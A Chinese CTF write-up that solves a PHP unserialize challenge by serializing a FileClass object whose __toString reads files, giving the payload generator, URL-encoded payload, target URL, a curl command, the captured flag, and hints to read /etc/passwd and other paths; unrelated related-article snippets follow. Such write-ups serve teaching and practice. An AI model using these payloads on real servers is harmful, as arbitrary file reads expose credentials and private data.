【CTF-WEB-反序列化】利用__toString魔術方法讀取flag.php

題目

頁面提示輸入?code,那我們在網址里get一下
在這里插入圖片描述
出現了新頁面的提示,進入看看
在這里插入圖片描述
下面有個help.php頁面的提示,進入看看
在這里插入圖片描述

有一段php代碼,仔細分析,應該是要用反序列法
在這里插入圖片描述

代碼如下

class FileClass{ public $filename = 'error.log'; public function __toString(){ return file_get_contents($this->filename); } 
}

代碼分析

關鍵點解析:

  1. 類結構

    • FileClass 是一個PHP類
    • public $filename = 'error.log':公共屬性,默認值為’error.log’
    • public function __toString():PHP魔術方法
  2. __toString() 魔術方法

    • 這是PHP中的特殊方法
    • 當對象被當作字符串處理時自動調用
    • 例如:echo $objectprint $object或字符串連接時
    • 本例中它執行file_get_contents($this->filename),那么我們就想辦法,讓這個方法去讀取flag文件
  3. 文件讀取機制

    • file_get_contents() 讀取文件內容
    • 讀取的文件路徑由$this->filename決定
    • 默認讀取error.log,但屬性值可修改
  4. 安全漏洞

    • 如果攻擊者能控制$filename的值
    • 就能讀取服務器任意文件
    • 這是典型的"任意文件讀取"漏洞

構造攻擊的Payload生成器

將下列代碼用php運行,得到結果O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";}

<?php
class FileClass{public $filename = 'flag.php';
}$file = new FileClass();
echo serialize($file);
?>

通常flag就存儲在這flag.php個文件里

在這里插入圖片描述

關鍵點解析:

  1. 類定義
    • 復制目標網站的類名FileClass
    • 修改$filename為攻擊目標flag.php

為什么需要完全相同的類名?
在反序列化過程中,PHP會根據序列化字符串中的類名:

  • 查找當前是否已定義同名類
  • 如果找到,使用該類創建對象
  • 如果未找到,創建__PHP_Incomplete_Class特殊對象
    因此攻擊代碼中必須使用完全相同的類名FileClass,否則:
  • 服務器找不到類定義
  • 無法正確創建對象
  • __toString()不會被觸發
  1. 對象創建
    • $file = new FileClass(); 創建對象實例
    • 此時$file->filename = 'flag.php'

重寫屬性值不會破壞__toString()方法,反而讓方法基于新值執行,這正是PHP對象序列化漏洞能被利用的根本原因——攻擊者可以控制對象狀態,而服務器代碼會基于該狀態執行敏感操作。

  1. 序列化

    • serialize($file) 將對象轉為序列化字符串
    • 結果示例:O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";}
    • 格式解析:
      • O:9:"FileClass":對象(類名長度9)
      • 1:1個屬性
      • {s:8:"filename":屬性名(字符串長度8)
      • s:8:"flag.php":屬性值(字符串長度8)
  2. URL編碼
    需要對序列化字符串進行編碼,這是為了確保在通過URL參數傳遞時,特殊字符(如雙引號、冒號等)不會破壞URL結構。
    可以使用urlencode(serialize($file)) 進行編碼

    • 確保安全傳輸:
      • :%3A
      • "%22
      • ;%3B
      • {%7B
      • }%7D
    • 最終結果:O%3A9%3A%22FileClass%22%3A1%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3B%7D

本文實際操作中,URL 編碼/解碼網站直接對后面的參數進行編碼即可。

  • 最終攻擊網址為:http://223.112.39.132:44813/index.php?code=O%3A9%3A%22FileClass%22%3A1%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3B%7D

在這里插入圖片描述
在這里插入圖片描述
ctf{64e3be45fb0848259cdcc624758a23119d9a035c}

  1. 查看結果:
  • 如果頁面顯示PHP代碼 → 查看網頁源代碼
  • 如果空白 → 嘗試其他文件路徑
  • 常見備選路徑:
    $filename = '/flag';          // 根目錄下的flag文件
    $filename = '../../flag.php'; // 上級目錄
    $filename = '/etc/passwd';    // 測試文件
    

為什么CTF題目這樣設計?

  1. 漏洞教育:展示反序列化漏洞的實際危害
  2. 魔術方法風險:演示__toString()等魔術方法的安全隱患
  3. 屬性控制:說明用戶可控對象屬性的危險性
  4. 文件讀取:任意文件讀取是常見高危漏洞類型

這種設計完美展示了:當不可信輸入直接傳遞給unserialize()時,攻擊者可以通過控制對象屬性實現敏感操作。

為什么這樣做能獲取flag?

  1. 服務器存在反序列化漏洞:它接收code參數并直接反序列化
  2. 反序列化后創建了FileClass對象
  3. 當服務器嘗試輸出該對象時,自動調用__toString()方法
  4. 該方法讀取并返回flag.php的內容
  5. 你就能在頁面中看到flag文件的內容

現在嘗試執行這些步驟,應該能成功獲取flag!如果遇到問題,可以嘗試不同的文件路徑或檢查payload格式是否正確。

備注

  1. 文件路徑問題

    • 如果flag.php不在當前目錄,嘗試:
      • /flag
      • /flag.txt
      • ../../flag.php
      • /var/www/html/flag.php
  2. 調試技巧

    • 通常,也可以先嘗試讀取/etc/passwd確認漏洞存在:
      $filename = '/etc/passwd';
      
    • 如果頁面顯示空白,查看網頁源代碼
    • 也可以使用curl測試:
      curl "http://223.112.39.132:44813/help.php?code=O%3A9%3A%22FileClass%22%3A1%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3B%7D"
      

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/90890.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/90890.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/90890.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

在 github.com 與 sourceforge.net 上創建免費個人靜態網站、博客的區別

github.com github 屬于 git 版本管理專業網站&#xff0c;有免費和收費兩種套餐。git 的數據是存放在數據庫中的&#xff0c;要將數據庫中的數據顯示為網站的網頁&#xff0c;這需要服務器端提供專門的中間件支持才能實現。 特點&#xff1a; 官方支持&#xff1a;提供長期…

jenkins 入門指南:從安裝到啟動的完整教程

jenkins 入門指南&#xff1a;從安裝到啟動的完整教程 持續集成&#xff08;CI&#xff09;是現代開發流程中的核心環節&#xff0c;而 Jenkins 作為一款開源的 CI 工具&#xff0c;憑借簡單安裝、開箱即用、插件豐富、易于擴展等優勢&#xff0c;成為開發者的首選工具。它能自…

機器學習(重學版)基礎篇(概念與評估)

本篇參考周志華老師的西瓜書&#xff0c;但是本人學識有限僅能理解皮毛&#xff0c;如有錯誤誠請讀友評論區指正&#xff0c;萬分感謝。一、基礎概念與評估方法本節目標&#xff1a;建立理論基礎框架?1、機器學習定義機器學習是一門通過計算手段利用經驗&#xff08;以數據形式…

spring/springboot SPI(二)配合使用的接口

spring.factories 里&#xff0c;Spring 會根據接口來加載實現類&#xff0c;常見的幾個接口包括&#xff1a;一、org.springframework.context.ApplicationListener1、作用監聽 Spring 容器事件&#xff0c;如 ApplicationReadyEvent。2、使用方法項目結構Spring Boot 2.xSpri…

基于Zig語言,opencv相關的c++程序靜態交叉編譯

一、寫在前面 1.什么是zig? Zig 是一種通用編程語言&#xff1b; Zig 最初的定位就是代替C語言的系統級語言&#xff0c;它提供了與 C 語言幾乎 100% 兼容&#xff08;可直接調用 C 頭文件、鏈接 C 庫&#xff09;&#xff0c;同時不需要任何依賴構建系統。 Zig 同時附帶一…

基于 LSTM 與 SVM 融合的時間序列預測模型:理論框架與協同機制—實踐算法(1)

目錄 1、單一模型的局限性&#xff1a;混合架構的設計動機 2、LSTM 的時序特征提取&#xff1a;從原始序列到高階表征 2.1、門控機制的時序過濾能力 2.2、隱藏狀態的特征壓縮作用 2.3、預訓練的特征優化邏輯 3、SVM 的非線性映射&#xff1a;從高階特征到預測輸出 3.1、…

如何查看docker實例是否掛載目錄,以及掛載了哪些目錄

一條命令即可一次性列出當前容器里所有掛載點&#xff1a; docker inspect <容器ID或名稱> --format{{range .Mounts}}{{printf "%-8s %-35s -> %s\n" .Type .Source .Destination}}{{end}}示例輸出&#xff1a; bind /host/owrt/src …

Opentrons 模塊化平臺與AI技術助力智能移液創新,賦能AAW?自動化工作站

在生命科學領域加速擁抱自動化的關鍵節點&#xff0c;全球開源實驗室自動化領導者 Opentrons 攜手全球領先生命科學公司默克生命科學&#xff0c;重磅推出 AAW?智能自動化液體處理平臺。這一戰略合作的核心技術引擎 ——Opentrons Flex 第三代全自動移液工作站&#xff0c;正以…

C++學習筆記(八:函數與變量)

往篇內容&#xff1a; C學習筆記&#xff08;一&#xff09; 一、C編譯階段※ 二、入門案例解析 三、命名空間詳解 四、C程序結構 C學習筆記&#xff08;二&#xff09; 五、函數基礎 六、標識符 七、數據類型 補充&#xff1a;二進制相關的概念 sizeof 運算符簡介 補…

智慧施工:施工流程可視化管理系統

圖撲智慧施工全流程可視化管理系統&#xff0c;通過可視化界面&#xff0c;可直觀掌握各工序銜接進度、資源調配情況&#xff0c;快速識別違規作業、設備故障等風險點 —— 如塔吊運行半徑重疊、深基坑支護位移預警等。同時&#xff0c;系統支持施工方案模擬推演&#xff0c;對…

單鏈表的冒泡排序實現:從原理到代碼詳解

單鏈表的冒泡排序實現&#xff1a;從原理到代碼詳解 引言 單鏈表作為一種常見的數據結構&#xff0c;其排序操作因節點無法隨機訪問&#xff08;需通過指針遍歷&#xff09;而與數組排序存在差異。冒泡排序因其實現簡單、無需額外空間&#xff08;僅需指針操作&#xff09;&…

如何在 Ubuntu 24.04 或 22.04 上安裝和使用 GDebi

APT 是 Ubuntu 上安裝需要外部依賴項的 Debian 包的一種方式,但還有另一種選擇,即 GDebi。本文將介紹如何在 Ubuntu 24.04 上安裝 GDebi,以及如何使用它來安裝 .deb 包所需的依賴項。 什么是 GDebi? GDebi 是默認的 .deb 包安裝器 DPKG 的輕量級替代品。與 DPKG 不同,GD…

俄羅斯方塊游戲開發(面向對象編程)

摘要本設計基于MATLAB面向對象編程技術&#xff0c;開發了一款具備完整游戲邏輯的俄羅斯方塊游戲。通過類封裝實現游戲核心模塊&#xff08;方塊管理、游戲板狀態、碰撞檢測等&#xff09;&#xff0c;采用旋轉矩陣實現方塊變形&#xff0c;結合MATLAB圖形用戶界面&#xff08;…

背包DP之多重背包

背包DP之多重背包一、多重背包基礎認知1.1 問題定義1.2 核心特征二、基礎解法&#xff1a;暴力拆分2.1 核心思路2.2 代碼實現2.3 局限性分析三、優化解法&#xff1a;二進制拆分3.1 優化原理3.2 拆分步驟3.3 代碼實現3.4 復雜度分析四、二進制拆分過程五、多重背包的變種與應用…

Ansible 變量指南:聲明、優先級、作用域與最佳實踐(一)

Ansible 變量的聲明 前言 全面理解 Ansible 變量是編寫高效、可維護 Playbook 的關鍵。由于最近使用 Ansible 比較多&#xff0c;在變量問題上踩了不少坑&#xff0c;也因此對變量的聲明&#xff0c;優先級和作用域有了更深的理解。姑且總結一下&#xff0c;分享給大家&#…

[極客大挑戰 2019]FinalSQL--布爾盲注

直接看題可以看到題目給了提示盲注&#xff01;那么接下來就是尋找注入點了&#xff01;那么不能發現注入點就是id了&#xff01;注入類型為數值型注入&#xff01;這里直接嘗試盲注。但是這里and被過濾了&&也不行。問了幾個師傅說用or&#xff0c;但是空格被過濾了&am…

再談fpga開發(狀態機的應用)

【 聲明&#xff1a;版權所有&#xff0c;歡迎轉載&#xff0c;請勿用于商業用途。 聯系信箱&#xff1a;feixiaoxing 163.com】前面說過&#xff0c;fpga上面最基礎的部分是寄存器&#xff0c;而所有寄存器存在每一個clock下&#xff0c;都有被翻轉的可能性。至于這些寄存器是…

TCP如何解決網絡切換問題

一、傳統TCP的網絡切換問題核心問題&#xff1a;TCP 連接基于四元組&#xff08;源IP、源端口、目的IP、目的端口&#xff09;&#xff0c;IP 變化導致連接失效二、改進方案與技術演進1. MPTCP&#xff08;多路徑TCP&#xff09; - 主流解決方案核心機制&#xff1a;單連接多路…

【Linux】常用命令(一)

【Linux】常用命令 一1. ls1.1 ls -a 顯示所有文件及其目錄1.2 ls -A 不顯示當前目錄和父目錄1.3 ls -d 顯示目錄本身&#xff0c;而不是顯示其內部內容1.4 ls -i 顯示文件的inode屬性信息1.4.1 實際用途場景1.5 ls -l 顯示文件的詳細屬性信息1.6 ls -R 遞歸顯示所有子文件1.7 …

Window 部署 coze-stdio(coze 開發平臺)

參考鏈接 https://github.com/coze-dev/coze-studio/wiki/2.-%E5%BF%AB%E9%80%9F%E5%BC%80%E5%A7%8B https://github.com/coze-dev/coze-studio/wiki/3.-%E6%A8%A1%E5%9E%8B%E9%85%8D%E7%BD%AE 環境說明 Docker&#xff1a;28.3.2 系統&#xff1a;Window 11 配置要求 CP…